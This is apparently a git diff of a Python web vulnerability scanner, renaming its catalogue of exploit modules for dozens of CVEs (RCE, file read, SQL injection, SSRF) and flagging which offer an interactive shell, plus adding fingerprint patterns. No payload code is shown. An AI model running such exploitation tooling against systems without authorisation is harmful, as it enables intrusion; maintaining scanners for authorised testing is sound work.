-            'type': 'unAuth',
+            'payload': 'alibaba-druid-unauth',
             'shell': '-',
             'description': list_lang['Alibaba Druid']
         }
     ],
     'Alibaba Nacos': [
         {
-            'vul_id': 'CVE-2021-29441',
-            'type': 'unAuth',
+            'payload': 'alibaba-nacos-cve-2021-29441-unauth',
             'shell': '-',
             'description': list_lang['Alibaba Nacos']['CVE-2021-29441']
         }
     ],
     'Apache Airflow': [
         {
-            'vul_id': 'CVE-2020-17526',
-            'type': 'unAuth',
+            'payload': 'apache-airflow-cve-2020-17526-unauth',
             'shell': '-',
             'description': list_lang['Apache Airflow']['CVE-2020-17526']
         }
     ],
     'Apache APISIX': [
         {
-            'vul_id': 'CVE-2020-13945',
-            'type': 'unAuth',
+            'payload': 'apache-apisix-cve-2020-13945-unauth',
             'shell': '-',
             'description': list_lang['Apache APISIX']['CVE-2020-13945']
         }
     ],
     'Apache Druid': [
         {
-            'vul_id': 'CVE-2021-25646',
-            'type': 'RCE',
+            'payload': 'apache-druid-cve-2021-25646-rce',
             'shell': 'Y',
             'description': list_lang['Apache Druid']['CVE-2021-25646']
         },
         {
-            'vul_id': 'CVE-2021-36749',
-            'type': 'FileRead',
+            'payload': 'apache-druid-cve-2021-36749-fileread',
             'shell': 'Y',
             'description': list_lang['Apache Druid']['CVE-2021-36749']
         },
     ],
     'Apache Flink': [
         {
-            'vul_id': 'CVE-2020-17519',
-            'type': 'FileRead',
+            'payload': 'apache-flink-cve-2020-17519-fileread',
             'shell': 'Y',
             'description': list_lang['Apache Flink']['CVE-2020-17519']
         }
     ],
     'Apache Hadoop': [
         {
-            'vul_id': '(None)',
-            'type': 'unAuth',
+            'payload': 'apache-hadoop-unauth',
             'shell': '-',
             'description': list_lang['Apache Hadoop']
         }
     ],
     'Apache Httpd': [
         {
-            'vul_id': 'CVE-2021-40438',
-            'type': 'SSRF',
+            'payload': 'apache-httpd-cve-2021-40438-ssrf',
             'shell': '-',
             'description': list_lang['Apache Httpd']['CVE-2021-40438']
         },
         {
-            'vul_id': 'CVE-2021-41773',
-            'type': 'FileRead/RCE',
+            'payload': 'apache-httpd-cve-2021-41773-rce-fileread',
             'shell': 'Y',
             'description': list_lang['Apache Httpd']['CVE-2021-41773']
         },
         {
-            'vul_id': 'CVE-2021-42013',
-            'type': 'FileRead/RCE',
+            'payload': 'apache-httpd-cve-2021-42013-rce-fileread',
             'shell': 'Y',
             'description': list_lang['Apache Httpd']['CVE-2021-42013']
         }
     ],
     'Apache SkyWalking': [
         {
-            'vul_id': 'CVE-2020-9483',
-            'type': 'SQLinject',
+            'payload': 'apache-skywalking-cve-2020-9483-sqlinject',
             'shell': '-',
             'description': list_lang['Apache SkyWalking']['CVE-2020-9483']
         }
     ],
     'Apache Solr': [
         {
-            'vul_id': 'CVE-2017-12629',
-            'type': 'RCE',
+            'payload': 'apache-solr-cve-2017-12629-rce',
             'shell': '-',
             'description': list_lang['Apache Solr']['CVE-2017-12629']
         },
         {
-            'vul_id': 'CVE-2019-17558',
-            'type': 'RCE',
+            'payload': 'apache-solr-cve-2019-17558-rce',
             'shell': 'Y',
             'description': list_lang['Apache Solr']['CVE-2019-17558']
         },
         {
-            'vul_id': 'CVE-2021-27905',
-            'type': 'SSRF/FileRead',
+            'payload': 'apache-solr-cve-2021-27905-ssrf-fileread',
             'shell': 'Y',
             'description': list_lang['Apache Solr']['CVE-2021-27905']
         },
     ],
     'Apache Tomcat': [
         {
-            'vul_id': 'CVE-2017-12615',
-            'type': 'FileUpload',
+            'payload': 'apache-tomcat-cve-2017-12615-fileupload',
             'shell': '-',
             'description': list_lang['Apache Tomcat']['CVE-2017-12615']
         }
     ],
     'Apache Unomi': [
         {
-            'vul_id': 'CVE-2020-13942',
-            'type': 'RCE',
+            'payload': 'apache-unomi-cve-2020-13942-rce',
             'shell': 'Y',
             'description': list_lang['Apache Unomi']['CVE-2020-13942']
         }
     ],
     'AppWeb': [
         {
-            'vul_id': 'CVE-2018-8715',
-            'type': 'unAuth',
+            'payload': 'appweb-cve-2018-8715-unauth',
             'shell': '-',
             'description': list_lang['AppWeb']['CVE-2018-8715']
         }
     ],
     'Atlassian Confluence': [
         {
-            'vul_id': 'CVE-2015-8399',
-            'type': 'FileRead',
+            'payload': 'atlassian-confluence-cve-2015-8399-fileread-fileinclude',
             'shell': 'Y',
             'description': list_lang['Atlassian Confluence']['CVE-2015-8399']
         },
         {
-            'vul_id': 'CVE-2019-3396',
-            'type': 'FileRead',
+            'payload': 'atlassian-confluence-cve-2019-3396-fileread',
             'shell': 'Y',
             'description': list_lang['Atlassian Confluence']['CVE-2019-3396']
         },
         {
-            'vul_id': 'CVE-2021-26084',
-            'type': 'RCE',
+            'payload': 'atlassian-confluence-cve-2021-26084-rce',
             'shell': 'Y',
             'description': list_lang['Atlassian Confluence']['CVE-2021-26084']
         },
         {
-            'vul_id': 'CVE-2022-26134',
-            'type': 'RCE',
+            'payload': 'atlassian-confluence-cve-2022-26134-rce',
             'shell': 'Y',
             'description': list_lang['Atlassian Confluence']['CVE-2022-26134']
         }
     ],
     'Cisco': [
         {
-            'vul_id': 'CVE-2020-3580',
-            'type': 'XSS',
+            'payload': 'cisco-cve-2020-3580-xss',
             'shell': '-',
             'description': list_lang['Cisco']['CVE-2020-3580']
         }
     ],
     'Discuz': [
         {
-            'vul_id': 'wooyun-2010-080723',
-            'type': 'RCE',
+            'payload': 'discuz-wooyun-2010-080723-rce',
             'shell': 'Y',
             'description': list_lang['Discuz']['wooyun-2010-080723']
         }
     ],
     'Django': [
         {
-            'vul_id': 'CVE-2017-12794',
-            'type': 'XSS',
+            'payload': 'django-cve-2017-12794-xss',
             'shell': '-',
             'description': list_lang['Django']['CVE-2017-12794']
         },
         {
-            'vul_id': 'CVE-2018-14574',
-            'type': 'Redirect',
+            'payload': 'django-cve-2018-14574-redirect',
             'shell': '-',
             'description': list_lang['Django']['CVE-2018-14574']
         },
         {
-            'vul_id': 'CVE-2019-14234',
-            'type': 'SQLinject',
+            'payload': 'django-cve-2019-14234-sqlinject',
             'shell': '-',
             'description': list_lang['Django']['CVE-2019-14234']
         },
         {
-            'vul_id': 'CVE-2020-9402',
-            'type': 'SQLinject',
+            'payload': 'django-cve-2020-9402-sqlinject',
             'shell': '-',
             'description': list_lang['Django']['CVE-2020-9402']
         },
         {
-            'vul_id': 'CVE-2021-35042',
-            'type': 'SQLinject',
+            'payload': 'django-cve-2021-35042-sqlinject',
             'shell': '-',
             'description': list_lang['Django']['CVE-2021-35042']
         }
     ],
     'Drupal': [
         {
-            'vul_id': 'CVE-2014-3704',
-            'type': 'SQLinject',
+            'payload': 'drupal-cve-2014-3704-sqlinject',
             'shell': '-',
             'description': list_lang['Drupal']['CVE-2014-3704']
         },
         {
-            'vul_id': 'CVE-2017-6920',
-            'type': 'RCE',
+            'payload': 'drupal-cve-2017-6920-rce',
             'shell': '-',
             'description': list_lang['Drupal']['CVE-2017-6920']
         },
         {
-            'vul_id': 'CVE-2018-7600',
-            'type': 'RCE',
+            'payload': 'drupal-cve-2018-7600-rce',
             'shell': 'Y',
             'description': list_lang['Drupal']['CVE-2018-7600']
         },
         {
-            'vul_id': 'CVE-2018-7602',
-            'type': 'RCE',
+            'payload': 'drupal-cve-2018-7602-rce',
             'shell': '-',
             'description': list_lang['Drupal']['CVE-2018-7602']
         }
     ],
     'ElasticSearch': [
         {
-            'vul_id': 'CVE-2014-3120',
-            'type': 'RCE',
+            'payload': 'elasticsearch-cve-2014-3120-rce',
             'shell': 'Y',
             'description': list_lang['ElasticSearch']['CVE-2014-3120']
         },
         {
-            'vul_id': 'CVE-2015-1427',
-            'type': 'RCE',
+            'payload': 'elasticsearch-cve-2015-1427-rce',
             'shell': 'Y',
             'description': list_lang['ElasticSearch']['CVE-2015-1427']
         },
         {
-            'vul_id': 'CVE-2015-3337',
-            'type': 'FileRead',
+            'payload': 'elasticsearch-cve-2015-3337-fileread',
             'shell': 'Y',
             'description': list_lang['ElasticSearch']['CVE-2015-3337']
         },
         {
-            'vul_id': 'CVE-2015-5531',
-            'type': 'FileRead',
+            'payload': 'elasticsearch-cve-2015-5531-fileread',
             'shell': 'Y',
             'description': list_lang['ElasticSearch']['CVE-2015-5531']
         },
     ],
     'F5 BIG-IP': [
         {
-            'vul_id': 'CVE-2020-5902',
-            'type': 'RCE',
+            'payload': 'f5bigip-cve-2020-5902-rce-fileread',
             'shell': '-',
             'description': list_lang['F5 BIG-IP']['CVE-2020-5902']
         },
         {
-            'vul_id': 'CVE-2022-1388',
-            'type': 'unAuth/RCE',
+            'payload': 'f5bigip-cve-2022-1388-unauth-rce',
             'shell': 'Y',
-            'description': list_lang['F5 BIG-IP']['CVE-2020-5902']
+            'description': list_lang['F5 BIG-IP']['CVE-2022-1388']
         }
     ],
     'Fastjson': [
         {
-            'vul_id': 'CNVD-2017-02833',
-            'type': 'unSerialize',
+            'payload': 'fastjson-cnvd-2017-02833-rce',
             'shell': 'Y',
             'description': list_lang['Fastjson']['CNVD-2017-02833']
         },
         {
-            'vul_id': 'CNVD-2019-22238',
-            'type': 'unSerialize',
+            'payload': 'fastjson-cnvd-2019-22238-rce',
             'shell': 'Y',
             'description': list_lang['Fastjson']['CNVD-2019-22238']
         },
         {
-            'vul_id': 'rce-1-2-62',
-            'type': 'unSerialize',
+            'payload': 'fastjson-v1.2.62-rce',
             'shell': 'Y',
             'description': list_lang['Fastjson']['rce-1-2-62']
         },
         {
-            'vul_id': 'rce-1-2-66',
-            'type': 'unSerialize',
+            'payload': 'fastjson-v1.2.66-rce',
             'shell': 'Y',
             'description': list_lang['Fastjson']['rce-1-2-66']
         }
     ],
     'Gitea': [
         {
-            'vul_id': '(None)',
-            'type': 'unAuth',
+            'payload': 'gitea-unauth-fileread-rce',
             'shell': '-',
             'description': list_lang['Gitea']
         },
     ],
     'Gitlab': [
         {
-            'vul_id': 'CVE-2021-22205',
-            'type': 'RCE',
+            'payload': 'gitlab-cve-2021-22205-rce.py',
             'shell': '-',
             'description': list_lang['Gitlab']['CVE-2021-22205']
         },
         {
-            'vul_id': 'CVE-2021-22214',
-            'type': 'SSRF',
+            'payload': 'gitlab-cve-2021-22214-ssrf',
             'shell': 'Y',
             'description': list_lang['Gitlab']['CVE-2021-22214']
         }
     ],
     'GoCD': [
         {
-            'vul_id': 'CVE-2021-43287',
-            'type': 'FileRead',
+            'payload': 'gocd-cve-2021-43287-fileread',
             'shell': 'Y',
             'description': list_lang['GoCD']['CVE-2021-43287']
         },
     ],
     'Grafana': [
         {
-            'vul_id': 'CVE-2021-43798',
-            'type': 'FileRead',
+            'payload': 'grafana-cve-2021-43798-fileread',
             'shell': 'Y',
             'description': list_lang['Grafana']['CVE-2021-43798']
         },
     ],
     'Influxdb': [
         {
-            'vul_id': '(None)',
-            'type': 'unAuth',
+            'payload': 'influxdb-unauth',
             'shell': '-',
             'description': list_lang['Influxdb']
         },
     ],
     'JBoss': [
         {
-            'vul_id': '(None)',
-            'type': 'unAuth',
+            'payload': 'jboss-unauth',
             'shell': '-',
             'description': list_lang['JBoss']['unAuth']
         }
     ],
     'Jenkins': [
         {
-            'vul_id': 'CVE-2018-1000861',
-            'type': 'RCE',
+            'payload': 'jenkins-cve-2018-1000861-rce',
             'shell': 'Y',
             'description': list_lang['Jenkins']['CVE-2018-1000861']
         },
         {
-            'vul_id': '(None)',
-            'type': 'unAuth',
+            'payload': 'jenkins-unauth',
             'shell': 'Y',
             'description': list_lang['Jenkins']['unAuth']
         },
     ],
     'Jetty': [
         {
-            'vul_id': 'CVE-2021-28164',
-            'type': 'DSinfo',
+            'payload': 'jetty-cve-2021-28164-dsinfo',
             'shell': '-',
             'description': list_lang['Jetty']['CVE-2021-28164']
         },
         {
-            'vul_id': 'CVE-2021-28169',
-            'type': 'DSinfo',
+            'payload': 'jetty-cve-2021-28169-dsinfo',
             'shell': '-',
             'description': list_lang['Jetty']['CVE-2021-28169']
         },
         {
-            'vul_id': 'CVE-2021-34429',
-            'type': 'DSinfo',
+            'payload': 'jetty-cve-2021-34429-dsinfo',
             'shell': '-',
             'description': list_lang['Jetty']['CVE-2021-34429']
         }
     ],
     'Joomla': [
         {
-            'vul_id': 'CVE-2017-8917',
-            'type': 'SQLinject',
+            'payload': 'joomla-cve-2017-8917-sqlinject',
             'shell': '-',
             'description': list_lang['Joomla']['CVE-2017-8917']
         },
         {
-            'vul_id': 'CVE-2023-23752',
-            'type': 'unAuth',
+            'payload': 'joomla-cve-2023-23752-unauth',
             'shell': '-',
             'description': list_lang['Joomla']['CVE-2023-23752']
         },
     ],
     'Jupyter': [
         {
-            'vul_id': '(None)',
-            'type': 'unAuth',
+            'payload': 'jupyter-unauth',
             'shell': '-',
             'description': list_lang['Jupyter']
         }
     ],
     'Keycloak': [
         {
-            'vul_id': 'CVE-2020-10770',
-            'type': 'SSRF',
+            'payload': 'keycloak-cve-2020-10770-ssrf',
             'shell': '-',
             'description': list_lang['Keycloak']['CVE-2020-10770']
         }
     ],
     # 'Kindeditor': [
     #     {
-    #         'vul_id': 'CVE-2018-18950',
+    #         'payload': '',
     #         'type': 'FileRead',
     #         'method': 'GET',
     #         'description': list_lang['']['']
@@ -484,332 +439,295 @@ def list():
     # ],
     'Landray': [
         {
-            'vul_id': 'CNVD-2021-28277',
-            'type': 'FileRead/SSRF',
+            'payload': 'landray-oa-cnvd-2021-28277-ssrf-fileread',
             'shell': 'Y',
             'description': list_lang['Landray']['CNVD-2021-28277']
         }
     ],
     'Mini Httpd': [
         {
-            'vul_id': 'CVE-2018-18778',
-            'type': 'FileRead',
+            'payload': 'minihttpd-cve-2018-18778-fileread',
             'shell': '-',
             'description': list_lang['Mini Httpd']['CVE-2018-18778']
         }
     ],
     'mongo-express': [
         {
-            'vul_id': 'CVE-2019-10758',
-            'type': 'RCE',
+            'payload': 'mongoexpress-cve-2019-10758-rce',
             'shell': 'Y',
             'description': list_lang['mongo-express']['CVE-2019-10758']
         }
     ],
     'Nexus Repository': [
         {
-            'vul_id': 'CVE-2019-5475',
-            'type': 'RCE',
+            'payload': 'nexus-cve-2019-5475-rce',
             'shell': 'Y',
             'description': list_lang['Nexus Repository']['CVE-2019-5475']
         },
         {
-            'vul_id': 'CVE-2019-7238',
-            'type': 'RCE',
+            'payload': 'nexus-cve-2019-7238-rce',
             'shell': 'Y',
             'description': list_lang['Nexus Repository']['CVE-2019-7238']
         },
         {
-            'vul_id': 'CVE-2019-15588',
-            'type': 'RCE',
+            'payload': 'nexus-cve-2019-15588-rce',
             'shell': 'Y',
             'description': list_lang['Nexus Repository']['CVE-2019-15588']
         },
         {
-            'vul_id': 'CVE-2020-10199',
-            'type': 'RCE',
+            'payload': 'nexus-cve-2020-10199-rce',
             'shell': 'Y',
             'description': list_lang['Nexus Repository']['CVE-2020-10199']
         },
         {
-            'vul_id': 'CVE-2020-10204',
-            'type': 'RCE',
+            'payload': 'nexus-cve-2020-10204-rce',
             'shell': 'Y',
             'description': list_lang['Nexus Repository']['CVE-2020-10204']
         }
     ],
     'Nodejs': [
         {
-            'vul_id': 'CVE-2017-14849',
-            'type': 'FileRead',
+            'payload': 'nodejs-cve-2017-14849-fileread',
             'shell': 'Y',
             'description': list_lang['Nodejs']['CVE-2017-14849']
         },
         {
-            'vul_id': 'CVE-2021-21315',
-            'type': 'RCE',
+            'payload': 'nodejs-cve-2021-21315-rce',
             'shell': 'Y',
             'description': list_lang['Nodejs']['CVE-2021-21315']
         }
     ],
     'NodeRED': [
         {
-            'vul_id': 'CVE-2021-3223',
-            'type': 'FileRead',
+            'payload': 'nodered-cve-2021-3223-fileread',
             'shell': 'Y',
             'description': list_lang['NodeRED']['CVE-2021-3223']
         }
     ],
     'phpMyadmin': [
         {
-            'vul_id': 'WooYun-2016-199433',
-            'type': 'unSerialize',
+            'payload': 'phpmyadmin-cve-2018-12613-fileinclude-fileread',
             'shell': '-',
             'description': list_lang['phpMyadmin']['WooYun-2016-199433']
         },
         {
-            'vul_id': 'CVE-2018-12613',
-            'type': 'FileInclude',
+            'payload': 'phpmyadmin-wooyun-2016-199433-unserialize',
             'shell': 'Y',
             'description': list_lang['phpMyadmin']['CVE-2018-12613']
         },
     ],
     'PHPUnit': [
         {
-            'vul_id': 'CVE-2017-9841',
-            'type': 'RCE',
+            'payload': 'phpunit-cve-2017-9841-rce',
             'shell': 'Y',
             'description': list_lang['PHPUnit']['CVE-2017-9841']
         }
     ],
     'Ruby on Rails': [
         {
-            'vul_id': 'CVE-2018-3760',
-            'type': 'FileRead',
+            'payload': 'ruby-on-rails-cve-2018-3760-fileread',
             'shell': 'Y',
             'description': list_lang['Ruby on Rails']['CVE-2018-3760']
         },
         {
-            'vul_id': 'CVE-2019-5418',
-            'type': 'FileRead',
+            'payload': 'ruby-on-rails-cve-2019-5418-fileread',
             'shell': 'Y',
             'description': list_lang['Ruby on Rails']['CVE-2019-5418']
         },
         {
-            'vul_id': 'CVE-2020-8163',
-            'type': 'RCE',
+            'payload': 'ruby-on-rails-cve-2020-8163-rce',
             'shell': '-',
             'description': list_lang['Ruby on Rails']['CVE-2020-8163']
         }
     ],
     'ShowDoc': [
         {
-            'vul_id': 'CNVD-2020-26585',
-            'type': 'FileUpload',
+            'payload': 'showdoc-cnvd-2020-26585-fileupload',
             'shell': '-',
             'description': list_lang['ShowDoc']['CNVD-2020-26585']
         }
     ],
     'Spring': [
         {
-            'vul_id': 'CVE-2016-4977',
-            'type': 'RCE',
+            'payload': 'spring-security-oauth-cve-2016-4977-rce',
             'shell': '-',
             'description': list_lang['Spring']['CVE-2016-4977']
         },
         {
-            'vul_id': 'CVE-2017-8046',
-            'type': 'RCE',
+            'payload': 'spring-data-rest-cve-2017-8046-rce',
             'shell': '-',
             'description': list_lang['Spring']['CVE-2017-8046']
         },
         {
-            'vul_id': 'CVE-2018-1273',
-            'type': 'RCE',
+            'payload': 'spring-data-commons-cve-2018-1273-rce',
             'shell': 'Y',
             'description': list_lang['Spring']['CVE-2018-1273']
         },
         {
-            'vul_id': 'CVE-2020-5410',
-            'type': 'FileRead',
+            'payload': 'spring-cloud-config-cve-2020-5410-fileread',
             'shell': 'Y',
             'description': list_lang['Spring']['CVE-2020-5410']
         },
         {
-            'vul_id': 'CVE-2021-21234',
-            'type': 'FileRead',
+            'payload': 'spring-boot-cve-2021-21234-fileread',
             'shell': 'Y',
             'description': list_lang['Spring']['CVE-2021-21234']
         },
         {
-            'vul_id': 'CVE-2022-22947',
-            'type': 'RCE',
+            'payload': 'spring-cloud-gateway-cve-2022-22947-rce',
             'shell': '-',
             'description': list_lang['Spring']['CVE-2022-22947']
         },
         {
-            'vul_id': 'CVE-2022-22963',
-            'type': 'RCE',
+            'payload': 'spring-cloud-function-cve-2022-22963-rce',
             'shell': 'Y',
             'description': list_lang['Spring']['CVE-2022-22963']
         },
         {
-            'vul_id': 'CVE-2022-22965',
-            'type': 'RCE',
+            'payload': 'spring-cve-2022-22965-rce',
             'shell': '-',
             'description': list_lang['Spring']['CVE-2022-22965']
         },
     ],
     'Supervisor': [
         {
-            'vul_id': 'CVE-2017-11610',
-            'type': 'RCE',
+            'payload': 'supervisor-cve-2017-11610-rce',
             'shell': '-',
             'description': list_lang['Supervisor']['CVE-2017-11610']
         }
     ],
     'ThinkPHP': [
         {
-            'vul_id': 'CVE-2018-1002015',
-            'type': 'RCE',
+            'payload': 'thinkphp-cve-2018-1002015-rce',
             'shell': 'Y',
             'description': list_lang['ThinkPHP']['CVE-2018-1002015']
         },
         {
-            'vul_id': 'CNVD-2018-24942',
-            'type': 'RCE',
+            'payload': 'thinkphp-cnvd-2018-24942-rce',
             'shell': 'Y',
             'description': list_lang['ThinkPHP']['CNVD-2018-24942']
         },
         {
-            'vul_id': 'CNNVD-201901-445',
-            'type': 'RCE',
+            'payload': 'thinkphp-cnnvd-201901-445-rce',
             'shell': 'Y',
             'description': list_lang['ThinkPHP']['CNNVD-201901-445']
         },
                 {
-            'vul_id': 'CNVD-2022-86535',
-            'type': 'RCE',
+            'payload': 'thinkphp-cnvd-2022-86535-rce',
             'shell': '-',
             'description': list_lang['ThinkPHP']['CNVD-2022-86535']
         },
         {
-            'vul_id': 'rce-2-x',
-            'type': 'RCE',
+            'payload': 'thinkphp-2.x-rce',
             'shell': '-',
             'description': list_lang['ThinkPHP']['2.x RCE']
         },
         {
-            'vul_id': 'ids-sqlinject-5',
-            'type': 'SQLinject',
+            'payload': 'thinkphp-5-ids-sqlinject',
             'shell': '-',
             'description': list_lang['ThinkPHP']['5 ids sqlinject']
         }
     ],
     'Ueditor': [
         {
-            'vul_id': '(None)',
-            'type': 'SSRF',
+            'payload': 'ueditor-ssrf',
             'shell': '-',
             'description': list_lang['Ueditor']
         }
     ],
     'uWSGI-PHP': [
         {
-            'vul_id': 'CVE-2018-7490',
-            'type': 'FileRead',
+            'payload': 'uwsgiphp-cve-2018-7490-fileread',
             'shell': 'Y',
             'description': list_lang['uWSGI-PHP']
         }
     ],
+    'VMware': [
+        {
+            'payload': 'vmware-vcenter-2020-10-fileread',
+            'shell': 'Y',
+            'description': list_lang['VMware']['2020-10-fileread']
+        },
+        {
+            'payload': 'vmware-vcenter-cve-2021-21972-fileupload-rce',
+            'shell': '-',
+            'description': list_lang['VMware']['CVE-2021-21972']
+        }
+    ],
     'Oracle Weblogic': [
         {
-            'vul_id': 'CVE-2014-4210',
-            'type': 'SSRF',
+            'payload': 'oracle-weblogic-cve-2014-4210-ssrf',
             'shell': '-',
             'description': list_lang['Oracle Weblogic']['CVE-2014-4210']
         },
         {
-            'vul_id': 'CVE-2017-10271',
-            'type': 'unSerialize',
+            'payload': 'oracle-weblogic-cve-2017-10271-unserialize',
             'shell': '-',
             'description': list_lang['Oracle Weblogic']['CVE-2017-10271']
         },
         {
-            'vul_id': 'CVE-2019-2725',
-            'type': 'unSerialize',
+            'payload': 'oracle-weblogic-cve-2019-2725-unserialize',
             'shell': '-',
             'description': list_lang['Oracle Weblogic']['CVE-2019-2725']
         },
         {
-            'vul_id': 'CVE-2020-14750',
-            'type': 'unAuth',
+            'payload': 'oracle-weblogic-cve-2020-14750-bypass',
             'shell': '-',
             'description': list_lang['Oracle Weblogic']['CVE-2020-14750']
         },
         {
-            'vul_id': 'CVE-2020-14882',
-            'type': 'RCE',
+            'payload': 'oracle-weblogic-cve-2020-14882-rce-unauth',
             'shell': 'Y',
             'description': list_lang['Oracle Weblogic']['CVE-2020-14882']
         },
         {
-            'vul_id': 'CVE-2021-2109',
-            'type': 'RCE',
+            'payload': 'oracle-weblogic-cve-2021-2109-rce',
             'shell': '-',
             'description': list_lang['Oracle Weblogic']['CVE-2021-2109']
         }
     ],
     'Webmin': [
         {
-            'vul_id': 'CVE-2019-15107',
-            'type': 'RCE',
+            'payload': 'webmin-cve-2019-15107-rce',
             'shell': 'Y',
             'description': list_lang['Webmin']['CVE-2019-15107']
         },
         {
-            'vul_id': 'CVE-2019-15642',
-            'type': 'RCE',
+            'payload': 'webmin-cve-2019-15642-rce',
             'shell': 'Y',
             'description': list_lang['Webmin']['CVE-2019-15642']
         }
     ],
     'Yonyou': [
         {
-            'vul_id': 'CNNVD-201610-923',
-            'type': 'SQLinject',
+            'payload': 'yonyou-grp-u8-cnnvd-201610-923-sqlinject',
             'shell': '-',
             'description': list_lang['Yonyou']['CNNVD-201610-923']
         },
         {
-            'vul_id': 'CNVD-2021-30167',
-            'type': 'RCE',
+            'payload': 'yonyou-nc-cnvd-2021-30167-rce',
             'shell': 'Y',
             'description': list_lang['Yonyou']['CNVD-2021-30167']
         },
         {
-            'vul_id': 'nc-fileread',
-            'type': 'FileRead',
+            'payload': 'yonyou-erp-nc-ncfindweb-fileread',
             'shell': '-',
             'description': list_lang['Yonyou']['NCFindWeb']
         },
         {
-            'vul_id': 'u8-oa-getsession',
-            'type': 'DSinfo',
+            'payload': 'yonyou-u8-oa-getsession-dsinfo',
             'shell': '-',
             'description': list_lang['Yonyou']['getSessionList.jsp']
         },
         {
-            'vul_id': 'u8-oa-test-sql',
-            'type': 'SQLinject',
+            'payload': 'yonyou-u8-oa-test.jsp-sqlinject',
             'shell': '-',
             'description': list_lang['Yonyou']['test.jsp']
         }
     ],
     'Zabbix': [
         {
-            'vul_id': 'CVE-2016-10134',
-            'type': 'SQLinject',
+            'payload': 'zabbix-cve-2016-10134-sqlinject',
             'shell': '-',
             'description': list_lang['Zabbix']['CVE-2016-10134']
         }
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 1893b1b..5597e29 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -14,12 +14,13 @@ def parse():
 
     parser = OptionParser('\n' + lang['disclaimer'] + '''Usage: python3 vulcat.py <options>
 Examples: 
-python3 vulcat.py -u https://www.example.com/
-python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3
-python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
-python3 vulcat.py -f url.txt -t 10 -o html
+python3 vulcat.py -h
 python3 vulcat.py --list
-''', version='vulcat.py-1.2.0\n')
+python3 vulcat.py -u https://www.example.com/
+python3 vulcat.py -f url.txt -o html
+python3 vulcat.py -u https://www.example.com/ -v httpd --log 3
+python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell
+''', version='vulcat.py-v2.0.0\n')
     # * 指定目标
     target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
     target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -29,7 +30,7 @@ def parse():
     # * 可选参数
     optional = parser.add_option_group(lang['optional_help']['title'], lang['optional_help']['name'])
     optional.add_option('-t', '--thread', type='int', dest='thread', default=3, help=lang['optional_help']['thread'])
-    optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay'])
+    optional.add_option('--delay', type='float', dest='delay', default=0.7, help=lang['optional_help']['delay'])
     optional.add_option('--timeout', type='float', dest='timeout', default=10, help=lang['optional_help']['timeout'])
     optional.add_option('--user-agent', type='string', dest='ua', default=None, help=lang['optional_help']['user_agent'])
     optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie'])
@@ -48,7 +49,7 @@ def parse():
 
     # * 指定目标类型
     application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name'])
-    application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
+    # application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
     application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln'])
     application.add_option('--shell', dest='shell', action='store_true', help=lang['application_help']['shell'])
     application.add_option('--type', type='string', dest='vulnType', default=None, help=lang['application_help']['type'])
@@ -72,6 +73,6 @@ def parse():
     lists = parser.add_option_group(lang['lists_help']['title'], lang['lists_help']['name'])
     lists.add_option('--list', dest='list', help=lang['lists_help']['list'], action='store_true')
 
-    app_list = parser.add_option_group(lang['app_list_help']['title'], lang['app_list_help']['name'])
+    # app_list = parser.add_option_group(lang['app_list_help']['title'], lang['app_list_help']['name'])
 
     return parser.parse_args()
\ No newline at end of file
diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py
index 177f655..c38ec1b 100644
--- a/lib/plugins/fingerprint/webapp.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -93,9 +93,9 @@ def identify(self, client):
                 return dedup_app_list
 
             logger.info('yellow_ex', self.lang['core']['web_finger']['NotFind'])
-            return None
+            return []
         except:
-            return None
+            return []
         
     def __init__(self):
         self.delay = config.get('delay')
@@ -103,6 +103,20 @@ def __init__(self):
 
         # * webapp指纹库
         self.webapp_fingerprint = [
+            {
+                'name': '74cms',
+                'path': '',
+                'data': '',
+                'fingerprint': [
+                    r'<title>骑士PHP高端人才系统(www\.74cms\.com)</title>',
+                    r'<meta name="keywords" content="骑士人才系统，74cms，骑士cms，人才网站源码，php人才网程序"/>',
+                    r'<meta name="description" content="骑士CMS是基于PHP\+MYSQL的免费网站管理系统，提供完善的人才招聘网站建设方案"/>',
+                    r'<meta name="author" content="骑士CMS"/>',
+                    r'<meta name="copyright" content="74cms\.com"/>',
+                    r'欢迎登录骑士人才系统！请.{10,70}登录.{10,70}或.{10,70}免费注册',
+                    r'<div class="user_foot font_gray9" id="footer">Copyright © 20\d{2} 74cms\.com All Right Reserved </div>',
+                ]
+            },
             {
                 'name': 'nacos',
                 'path': 'nacos/',
@@ -192,6 +206,15 @@ def __init__(self):
                     r'Apache2 package with Debian\. However, check.*existing bug reports'
                 ]
             },
+            {
+                'name': 'httpd',
+                'path': 'qwe',
+                'data': '',
+                'fingerprint': [
+                    r'<title>404 Not Found</title>.*<h1>Not Found</h1>.*<p>The requested URL /qwe was not found on this server\.</p>',
+                    r'<address>Apache/.{1,30} Server at .{1,30} Port \d{0,6}</address>',
+                ]
+            },
             {
                 'name': 'skywalking',
                 'path': '',
@@ -429,11 +452,20 @@ def __init__(self):
                 'data': '',
                 'fingerprint': [
                     r'<title>Welcome to JBoss&trade;</title>',
+                    r'<title>Welcome to JBoss AS</title>',
                     r'<link rel="StyleSheet" href="jboss.css" type="text/css"/>',
                     r'<a href="http://www\.jboss\.org">.*<img src="logo\.gif" alt="JBoss" id="logo" width="\d{1,5}" height="\d{1,5}" />',
+                    r'<a href="http://www\.jboss\.org">.*<img src="images/logo\.gif" alt="JBoss" id="logo" width="\d{1,5}" height="\d{1,5}" />',
                     r'<h3>JBoss Online Resources</h3>.*<h3>JBoss Management</h3>',
                     r'<li><a href="/web-console/">JBoss Web Console</a></li>',
                     r'<div id="credits">JBoss&trade; Application Server</div>',
+                    r'<li><a href="/jbossws/">JBoss Web Services Console</a></li>',
